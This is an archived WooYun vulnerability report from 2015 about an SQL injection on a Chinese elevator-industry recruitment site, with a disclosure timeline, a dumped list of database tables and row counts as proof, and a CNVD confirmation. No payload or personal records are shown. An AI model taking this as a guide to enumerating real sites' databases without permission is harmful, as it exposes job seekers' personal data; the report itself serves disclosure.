漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0141398
漏洞标题:电梯招聘网20万简历泄漏(身份证,电话,姓名,住址)
相关厂商:cncert国家互联网应急中心
漏洞作者: 路人甲
提交时间:2015-09-17 21:06
修复时间:2015-11-03 20:02
公开时间:2015-11-03 20:02
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-09-17: 细节已通知厂商并且等待厂商处理中
2015-09-19: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-09-29: 细节向核心白帽子及相关领域专家公开
2015-10-09: 细节向普通白帽子公开
2015-10-19: 细节向实习白帽子公开
2015-11-03: 细节向公众公开
简要描述:
倘若下午四点就能见到你,我便在下午三点就能感到快乐
详细说明:
漏洞证明:
Database: cabhr
+--------------------------------+---------+
| Table | Entries |
+--------------------------------+---------+
| cb_company_reapp | 1794462 |
| `cb_send_mail_15-04-01` | 884852 |
| cb_send_mail | 851893 |
| cb_email_maillist | 716576 |
| system_mail_userlist | 622650 |
| cb_company_viewresume | 510741 |
| cb_pugong_info | 390952 |
| cb_pugong | 390947 |
| cb_rencai_login | 388083 |
| cb_rencai_workexp | 347089 |
| cb_search_job_key | 329070 |
| cb_company_reapp_emailview | 301446 |
| cb_rencai | 216755 |
| cb_rencai_info | 216707 |
| cb_rencai_info_en | 216706 |
| cb_rencai_intent | 202359 |
| cb_rencai_edu | 182110 |
| cb_company_reapp_admin_appsave | 143094 |
| cb_job_basic | 132447 |
| cb_job_info | 132380 |
| system_sendmail_new | 129633 |
| crm_company_follow | 91966 |
| cb_company_login | 88770 |
| cb_user_refresh | 83208 |
| cb_hr_career | 80568 |
| cb_news | 67884 |
| cb_hr | 61797 |
| cb_rencai_wapwork | 50070 |
| system_sendmail | 40522 |
| cb_company | 37147 |
| cb_company_info | 37147 |
| cb_career | 36828 |
| crm_company_lavel | 33606 |
| cb_reg_sendemail | 33528 |
| cb_admin_login | 26960 |
| crm_company_contact | 26782 |
| cb_rencai_contact_change | 25023 |
| cb_rencai_train | 24425 |
| cb_company_login_error | 22938 |
| cb_rencai_contact_feedback | 20902 |
| cb_company_sms | 18370 |
| cb_company_viewcontact | 17080 |
| cb_rencai_colljob | 16824 |
| cb_company_invite_info | 16461 |
| cb_rencai_avoidcorp | 14888 |
| crm_company_remind | 14033 |
| crm_company_chang | 14015 |
| cb_company_flagchange | 12451 |
| cb_rencai_sex | 11337 |
| cb_search_rencai_key | 11139 |
| crm_company | 9920 |
| cb_company_downresume | 9392 |
| cb_company_collrencai | 7436 |
| crm_getcorp | 7263 |
| cb_send_mail_urgent | 6833 |
| cb_salary_new | 6555 |
| crm_company_give | 5782 |
| x_dt_job | 5179 |
| cb_rencai_sendmail | 5084 |
| cb_company_search_history | 4611 |
| cb_company_contact_change | 4251 |
| cb_rencai_sendmail_feekback | 3726 |
| cb_area | 3399 |
| get_jobs | 3005 |
| cb_company_img | 2818 |
| cb_company_dep | 2430 |
| x_link_job | 2277 |
| get_jobs_havecorp | 2184 |
| cb_sys_reccorp | 2141 |
| cb_rencai_downresume | 1908 |
| cb_wk_info | 1827 |
| crm_getcorp2 | 1575 |
| cb_pugong_corpview | 1372 |
| cb_salary_survey | 1361 |
| cb_company_logo | 1301 |
| cb_department_sell_change | 1254 |
| cb_rencai_sendsms_feekback | 1090 |
| cb_hr_word | 1024 |
| cb_company_upgrade | 933 |
| cb_problem | 884 |
| cb_company_level_reapp | 771 |
| cb_send_mail_reg | 770 |
| cb_company_limit | 764 |
| x_dt_company | 743 |
| crm_company_open | 732 |
| cb_user_changpwd | 705 |
| cb_company_renewal | 683 |
| crm_my_lavel | 473 |
| x_link_company | 430 |
| cb_send_mail_syssend | 424 |
| crm_company_fapiao | 410 |
| cb_rencai_workexp_en | 399 |
| crm_sell_corpperators | 354 |
| cb_rencai_intent_en | 287 |
| cb_adv | 276 |
| cb_links | 272 |
| cb_rencai_edu_en | 266 |
| crm_company_return | 264 |
| cb_user_lottery | 244 |
| cb_job_category | 237 |
| get_jobs_havejob | 213 |
| cb_job_headhunt_apply | 202 |
| cb_baike_entry | 181 |
| cb_company_remark | 168 |
| cb_job_templates | 155 |
| cb_pugong_viewcontact | 151 |
| cb_menu | 131 |
| cb_getjl_upinfo | 121 |
| cb_rencai_train_en | 121 |
| cb_replacekey_link | 93 |
| cb_company_setreply | 84 |
| cb_company_search_engine | 73 |
| cb_email_tpl | 68 |
| cb_help | 54 |
| cb_jipin_setcorp | 52 |
| cb_system | 50 |
| cb_yunying_uw | 49 |
| cb_company_category | 44 |
| cb_news_type | 36 |
| cb_adv_notice | 32 |
| cb_getjl_upinfo_sort | 30 |
| system_sendmail_job | 29 |
| cb_company_lavel | 26 |
| cb_send_mail_set | 23 |
| cb_exhibition_upinfo | 18 |
| cb_baike_sort | 16 |
| cb_company_type | 15 |
| cb_pugong_corp_logo | 13 |
| cb_wk_type | 12 |
| cb_company_nature | 11 |
| cb_hr_word_sort | 11 |
| crm_get_corpweb | 11 |
| cb_career_type | 7 |
| cb_hr_career_type | 7 |
| cb_hr_type | 7 |
| cb_company_folder | 6 |
| crm_sell_faq | 5 |
| cb_links_type | 4 |
| crm_email_tpl | 4 |
| cb_help_type | 3 |
| cb_job_setupdate | 1 |
| crm_set | 1 |
| dl_resume_zt | 1 |
| system_sendmail_max | 1 |
+--------------------------------+---------+
修复方案:
过滤
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2015-09-19 20:01
厂商回复:
CNVD确认所述情况,已经由CNVD通过网站公开联系方式向网站管理单位通报。
最新状态:
暂无